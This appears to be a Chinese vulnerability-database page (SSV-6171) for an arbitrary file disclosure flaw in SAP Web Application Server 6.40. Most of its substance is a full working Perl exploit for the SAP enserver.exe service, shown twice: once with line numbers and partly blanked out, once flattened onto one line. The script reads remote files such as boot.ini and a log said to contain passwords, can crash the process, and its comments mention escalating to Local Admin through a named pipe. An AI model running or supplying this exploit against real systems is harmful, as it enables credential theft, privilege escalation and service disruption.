SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit

基本字段

漏洞编号：: SSV-6171

披露/发现时间：: 未知

提交时间：: 2007-02-09

漏洞等级：

漏洞类别：: 信息泄漏

影响组件：: SAP

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.05KB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl&nbsp;-w
##
##&nbsp;SAP&nbsp;\\\'enserver.exe\\\'&nbsp;file&nbsp;downloader
##&nbsp;Tested&nbsp;on&nbsp;\\\"SAP&nbsp;Web&nbsp;Application&nbsp;Server&nbsp;Java&nbsp;6.40\\\"&nbsp;(eval&nbsp;DVD)
##&nbsp;Found&nbsp;&&nbsp;coded&nbsp;by&nbsp;Nicob
##
##&nbsp;The&nbsp;downloaded&nbsp;file&nbsp;is&nbsp;limited&nbsp;to&nbsp;the&nbsp;first&nbsp;32&nbsp;kilobytes
##&nbsp;Usual&nbsp;port&nbsp;:&nbsp;TCP/3200+SYSNR
##&nbsp;Exemple&nbsp;:&nbsp;./r3-stealer-1.0.pl&nbsp;192.168.2.22&nbsp;3201&nbsp;\\\"c:\\\\boot.ini\\\"
##
##&nbsp;From&nbsp;MSDN&nbsp;(Win2K&nbsp;pre-SP4,&nbsp;WinXP&nbsp;pre-SP2&nbsp;and&nbsp;WinNT)&nbsp;:
##&nbsp;\\\"\\\\\\\\your_box\\\\pipe\\\\your_pipe\\\"&nbsp;=>&nbsp;get&nbsp;Local&nbsp;Admin&nbsp;(SAPServiceJ2E)
##&nbsp;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
##&nbsp;File&nbsp;parameter&nbsp;:
##  C:\boot.ini
##&nbsp;    \\\\10.11.12.13shareimage.jpg
##  ............Documents&nbsp;and&nbsp;SettingsAll&nbsp;UsersApplication&nbsp;Datasapdbwahttpreq.log&nbsp;(contains&nbsp;passwords&nbsp;!)
##
#&nbsp;Init
use&nbsp;strict;
use&nbsp;IO::Socket;
my&nbsp;$verbose&nbsp;=&nbsp;0;
#&nbsp;Set&nbsp;this&nbsp;to&nbsp;anything&nbsp;not&nbsp;null&nbsp;to&nbsp;crash&nbsp;the&nbsp;process
my&nbsp;$crash&nbsp;=&nbsp;\\\"\\\";
my&nbsp;$socket;
my&nbsp;$reply;
$|=1;
#&nbsp;Get&nbsp;arguments
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

#!/usr/bin/perl -w ## ## SAP \\\'enserver.exe\\\' file downloader ## Tested on \\\"SAP Web Application Server Java 6.40\\\" (eval DVD) ## Found & coded by Nicob ## ## The downloaded file is limited to the first 32 kilobytes ## Usual port : TCP/3200+SYSNR ## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 \\\"c:\\\\boot.ini\\\" ## ## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) : ## \\\"\\\\\\\\your_box\\\\pipe\\\\your_pipe\\\" => get Local Admin (SAPServiceJ2E) ## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp ## ## File parameter : ## C:\boot.ini ##  \\\\10.11.12.13shareimage.jpg ## ............Documents and SettingsAll UsersApplication Datasapdbwahttpreq.log (contains passwords !) ## # Init use strict; use IO::Socket; my $verbose = 0; # Set this to anything not null to crash the process my $crash = \\\"\\\"; my $socket; my $reply; $|=1; # Get arguments if (($#ARGV<2) or ($ARGV[0] eq \\\"-h\\\")) {die \\\"Usage: $0 <ip> <port> <remote filename> (<local filename>) \\\";} my $host=$ARGV[0];  my $port=$ARGV[1];  my $filename=$ARGV[2];  my $output=$ARGV[3];  # Calculate variables my $lg = length($filename); my $tag1 = sprintf(\\\'%x\\\', 0x4F + $lg); my $tag2 = sprintf(\\\'%x\\\', 0x20 + $lg); # Show banner print \\\"##################################################################### \\\"; print \\\"### SAP \\\'enserver.exe\\\' file downloader \\\"; print \\\"### Downloading \\\'$filename\\\' from \\\'$host\\\' \\\"; print \\\"##################################################################### \\\"; # Define the packets my $packet1 = \\\"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003\\\". # Static \\\"5f6e69636f625f6e69636f625f6e69636f62315f\\\". # ASCII string : \\\"_nicob_nicob_nicob1_\\\"  \\\"00000000020000003b0000000500000002000000060000000400000001\\\"; # Static my $packet2 = \\\"000000\\\". $tag1. \\\"abcde12300000001000000\\\". $tag1 .\\\"000000\\\". $tag1 . \\\"03000000454e430001010000234541410100000013030000000000234541450001000000\\\". $tag2 . \\\"0000000000007d00000000000000000000000000\\\". unpack(\\\"H*\\\",$filename) . $crash .\\\"000023454144\\\"; # Crash if bad filename length # Create the socket $socket = IO::Socket::INET->new(Proto=>\\\"tcp\\\",PeerAddr=>$host,PeerPort => $port) || die \\\"Connection refused at [$host:$port]\\\"; # Send the two packet print $socket pack(\\\"H*\\\",$packet1); print $socket pack(\\\"H*\\\",$packet2); sleep 2; # Read and display response recv($socket,$reply,150000,MSG_PEEK); if ($reply =~ /^(.*)#EAD(.*)$/s) { print \\\"File received ! \\\"; if ((!defined($output)) or ($output eq \\\"\\\")) { print \\\" =========================================== \\\"; print $2; print \\\" =========================================== \\\"; } else { open(OUT, \\\"> $output\\\") || die \\\"Can\\\'t open $output ($0)\\\"; print \\\"File saved as \\\'$output\\\' \\\"; print OUT $2; close(OUT); } } else { print \\\"Problem interpreting reply :-( \\\"; } # Close the socket print \\\" The end ... \\\"; close $socket;

共 1 兑换

参考链接

解决方案

临时解决方案

无

官方解决方案

升级到最新无漏洞版本

防护方案

无

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定